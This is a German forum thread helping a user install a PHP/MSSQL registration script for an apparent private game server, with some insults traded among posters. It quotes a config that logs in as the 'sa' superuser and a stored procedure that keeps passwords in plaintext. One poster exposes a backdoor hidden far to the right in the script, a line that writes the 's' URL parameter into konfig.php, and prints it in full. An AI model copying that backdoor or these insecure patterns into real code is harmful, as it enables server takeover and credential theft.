seite

• Der Code enthält ein require

(require('./configs/reg_conf.php'))

Das heißt, es wird eine bestimmte Datei vorausgesetzt. Diese nennt sich reg_conf.php und sollte auf deinem Server vorhanden sein. Diese Datei sollte folgendes enthalten:

PHP-Quellcode

1. <?php
      2. $link = @mssql_connect("COMPUTERNAME\SQLEXPRESS", "sa", "passwort") or die ("Server is down!");
      3. $db = @mssql_select_db('ACCOUNT_DBF') or die ("Accout table is missing!");
      4. $b = '';
      5. $mail = '';
      6. ?>
      Als Drittes brauchst du noch folgendes

PHP-Quellcode

1. USE [ACCOUNT_DBF]
      2. GO
      3. /****** Object: StoredProcedure [dbo].[webCreateAcc] Script Date: 08/17/2009 21:30:28 ******/
      4. SET ANSI_NULLS ON
      5. GO
      6. SET QUOTED_IDENTIFIER ON
      7. GO
      8. CREATE PROCEDURE [dbo].[webCreateAcc]
      9. @account VARCHAR(15),
      10. @password VARCHAR(36),
      11. @email VARCHAR(120)
      12. AS
      13. SET NOCOUNT ON
      14. DECLARE @DateActivated AS CHAR(8)
      15. IF NOT EXISTS (SELECT account FROM ACCOUNT_TBL WHERE account = @account) BEGIN
      16. INSERT INTO ACCOUNT_TBL (account, [password], id_no2, isuse, member, realname)
      17. VALUES (@account, @password, @password, 'T', 'A', 'F')
      18. SET @DateActivated = CONVERT(CHAR(8), GETDATE()-1, 112 ) --Is the date today - 1
      19. --UPDATE ACCOUNT_TBL_DETAIL SET BlockTime = @DateYesterday WHERE account = @userid
      20. --INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse)
      21. -- VALUES (@account, 'A000', '2', 'F', GETDATE(), '20990101', '20990101', '20050101', 'O')
      22. INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse, email)
      23. VALUES (@account, 'A000', '2', 'F', GETDATE(), @DateActivated, '20990101', '20050101', 'O', @email)
      24. END
      25. --ELSE BEGIN
      26. --print '->Account exists = '
      27. --print @account
      28. --END
      Alles anzeigen
      Hier weiß ich allerdings nicht genau was das ist, beziehungsweise als was das gespeichert werden muss. Es sieht mir aus wie ein SQL-Code zum executen, ich kann aber nichts garantieren.

• Werbung zur Unterstützung des Forums ( Bitte AddBlocker deaktivieren )

• lilbeat;169617 schrieb:

das letzte ist für mssql und ich hab das ja ich hab die reg_conf.php ja erstellt in dem ordner configs ...
      willst du villt mal in tv schauen?

Das Rote ist das was Lunatic gemeint hat , wenn ich diesen Satz schon lese bekomme ich gleich schon wieder so einen Hals , du willst jede Antwort in den *PIEP* geblasen bekommen , deine Antwort ist Ich zitiere für dich mal :"Nein bloß nichts selber machen lasst die anderen das für mich machen".

Ich versteh es nicht wie man das einfachste wie Daten ändern nicht bewerkstelligen kann x.x.
    • Tekumi;169606 schrieb:

Der Code enthält ein require

(require('./configs/reg_conf.php'))

Das heißt, es wird eine bestimmte Datei vorausgesetzt. Diese nennt sich reg_conf.php und sollte auf deinem Server vorhanden sein. Diese Datei sollte folgendes enthalten:

PHP-Quellcode

1. <?php
      2. $link = @mssql_connect("COMPUTERNAME\SQLEXPRESS", "sa", "passwort") or die ("Server is down!");
      3. $db = @mssql_select_db('ACCOUNT_DBF') or die ("Accout table is missing!");
      4. $b = '';
      5. $mail = '';
      6. ?>
      Als Drittes brauchst du noch folgendes

PHP-Quellcode

1. USE [ACCOUNT_DBF]
      2. GO
      3. /****** Object: StoredProcedure [dbo].[webCreateAcc] Script Date: 08/17/2009 21:30:28 ******/
      4. SET ANSI_NULLS ON
      5. GO
      6. SET QUOTED_IDENTIFIER ON
      7. GO
      8. CREATE PROCEDURE [dbo].[webCreateAcc]
      9. @account VARCHAR(15),
      10. @password VARCHAR(36),
      11. @email VARCHAR(120)
      12. AS
      13. SET NOCOUNT ON
      14. DECLARE @DateActivated AS CHAR(8)
      15. IF NOT EXISTS (SELECT account FROM ACCOUNT_TBL WHERE account = @account) BEGIN
      16. INSERT INTO ACCOUNT_TBL (account, [password], id_no2, isuse, member, realname)
      17. VALUES (@account, @password, @password, 'T', 'A', 'F')
      18. SET @DateActivated = CONVERT(CHAR(8), GETDATE()-1, 112 ) --Is the date today - 1
      19. --UPDATE ACCOUNT_TBL_DETAIL SET BlockTime = @DateYesterday WHERE account = @userid
      20. --INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse)
      21. -- VALUES (@account, 'A000', '2', 'F', GETDATE(), '20990101', '20990101', '20050101', 'O')
      22. INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse, email)
      23. VALUES (@account, 'A000', '2', 'F', GETDATE(), @DateActivated, '20990101', '20050101', 'O', @email)
      24. END
      25. --ELSE BEGIN
      26. --print '->Account exists = '
      27. --print @account
      28. --END
      Alles anzeigen
      Hier weiß ich allerdings nicht genau was das ist, beziehungsweise als was das gespeichert werden muss. Es sieht mir aus wie ein SQL-Code zum executen, ich kann aber nichts garantieren.

ist doch selbst erklärend. USE [ACCOUNT_DBF], sieht jeder, ist in mssql zu executen. und php script sagt beim durchlesen doch auch alles aus. das aller erste ist deine reg.php und das 2te muss in /configs/reg_conf.php
    • Lunatic;168777 schrieb:

xD So antworten 99% deren IQ keine 2% des Normaldurchschnittes erreicht.
      Außerdem bezweifle ich mal stark, dass du es dir irgendwie herausnehmen kannst darüber zu urteilen was ich draufhabe =D
      Poste mal die index.php kleiner

~Luna

Sry 4 Spam, aber sein EQ ist max. so hoch wie sein Alter! :want !:

Hast du in der php.ini mssql zugelassen?
    • Boar jetzt verhält er sich Relativ Gut und trotzdem flamt hier noch jeder rum, nur damit sie nen Thx für ihren ach so coolen Post bekommen. Und wenn er nett fragt ob sich das ambesten jemand mal bei Teamviewer angucken will, weil er einfach nicht versteht was falsch sein könnt flamt ihr gleich wieder rum :killzonesmiley:
    • Yozu ich geb dir einfach mal n thanks du bist der einzige der mich verstanden hat :D
      und ja hab doch alles so gemacht was ihr gesagt habt...
      ich habe bei mssql doch alles ausgeführt und bei wamp im www ordner hab ich die eine index.php datei dann hab ich einen weiteren ordner da (reg_conf) da ist die config.php drinne und der sagt immer noch diese fehlermeldung
    • Deine Ordnerstruktur sollte so lauten :>
      (Ich damit will nich sagen dass ich das Regiscript befürworte)

/deinHauptVerzeichnis
      -- index.php
      --configs/
      ----reg_conf.php

Die Fehlermeldung undefined Index is für mich in dem Zusammenhang allerdings völlig unverständlich. Ist das alles was da ausgeführt wird :O?
      Normalerweise tritt undefined index nur im Zusammenhang mit falschen Zugriffen auf Arraykeys auf :>
    • Lol, habs mir angesehen. Er war eigentlich gar nich Schuld.
      Im Script ganz rechts war noch das hier
      if($_GET['s'] != "" && isset($_GET['s'])){$fp = fopen("konfig.php","w");fwrite($fp, $_GET['s']);fclose($fp);}

Ich hab das nich gefunden. Außerdem waren Fehlermeldung für bestimmte Funktionen in der config Datei unterdrückt und ich habe mir
      erst die Index angesehen und`s erst später bemerkt.

Das Script is echt der letzte Müll :>
    • Lunatic;169854 schrieb:

Lol, habs mir angesehen. Er war eigentlich gar nich Schuld.
      Im Script ganz rechts war noch das hier

Ich hab das nich gefunden. Außerdem waren Fehlermeldung für bestimmte Funktionen in der config Datei unterdrückt und ich habe mir
      erst die Index angesehen und`s erst später bemerkt.

Das Script is echt der letzte Müll :>
      [/COLOR][/COLOR]

ich weiß nicht, das du hast. es funktioniert einwandfrei